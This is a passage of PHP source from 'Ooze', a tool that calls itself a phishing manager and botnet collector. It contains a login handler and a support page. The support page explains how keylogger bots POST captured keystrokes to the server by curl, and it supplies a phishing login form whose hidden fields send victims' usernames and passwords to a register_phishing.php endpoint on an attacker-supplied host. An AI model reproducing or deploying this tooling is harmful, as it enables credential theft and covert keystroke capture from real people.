$_SESSION['passronin'] = $bcrypt_hash; if ($gen->verify($bcrypt_hash, $res[0]['pass']) == "false") { print "<img src=\"../view/images/alerta.png\">\n <h1>ERROR at auth 05</h1> \n <meta HTTP-EQUIV='refresh' CONTENT='2; URL=../view/login.php'>"; exit; } $janela = ' <div class="portlet portlet-closable x4"> <div class="portlet-header"> <h4>Login manager</h4> </div> <!-- .portlet-header --> <div class="portlet-content"> '; $var = "<p><b>Login:</b>" . $r['login'] . " <br> <b>owner:</b>" . $r['owner']; $bemvindo = "Welcome to Ooze tool</p>"; $values = array('last_ip' => "???"); //fix it $crud->Update('userronin', $values, 'id', $r['id']); $page->conteudo = $janela . " <br>" . $bemvindo . "<meta HTTP-EQUIV='refresh' CONTENT='1; URL=auth.php?page=conta'></div></div>"; print $page->display_page(); break; // SUport informations // SUport informations case "suporte": $page->titulo = "Suport"; $suporte = "<img src=\"../view/imagens/ooze2.png\"><font color=green><pre>\n \n\n Ooze is a phishing manager.\n Version: 1.0\n\n About botnets\n================\n\n Botnet send Keylogger information via HTTP method POST example with curl:\n---\n\$ curl \\\n-X POST \\\n--data 'secret_code=testbot&name=\"Test name\"&date=11/11/2032&system=\"Windows 7\"&ip=\"\"&keyboard=\"something test \n test test \n\"' \\\nhttp://localhost/Ooze/controller/register_machine.php\n---\n You can use sockets in C or C++ for example etc...\n\n secret_code param is the key to register information, you can change this static variable at directory \"Ooze/controller\" in files \n\"register_machine.php\" and \"register_phishing.php\".\n\n\n About Phishing\n================\n\n\tWhen writing passwords in TXT file, this is visible to others, so is not cool, good idea is store some password \nlike a database, with Ooze you can store login and passwords and url(site of phishing), loohk \n\nphishing.html (look name of fields)" . "<code>" . htmlentities("\n----\n <form method=\"post\" action=\"http://YOUR_HOST/Ooze/controller/register_phishing.php\">\n <p><input type=\"text\" name=\"name\" value=\"\" placeholder=\"Username or Email\"></p>\n <p><input type=\"password\" name=\"password\" value=\"\" placeholder=\"Password\"></p>\n <input id=\"1\" type=\"hidden\" name=\"secret_code\" value=\"testbot\">\n\t<input id=\"2\" type=\"hidden\" name=\"url\" value=\"Name of site site\">\n <p class=\"submit\"><input type=\"submit\" name=\"commit\" value=\"Login\"></p>\n </form>\n----\n") . "</code></font>" . "\nContact: coolerlair@gmail.com\n\n </pre>"; $page->conteudo = "<div style=\"background-color:black;\">" . $suporte . "</div></div>"; print $page->display_page(); break; case "conta": $janela .= '<div class="portlet portlet-closable x5"> <div class="portlet-header"> <h4>Acount information</h4>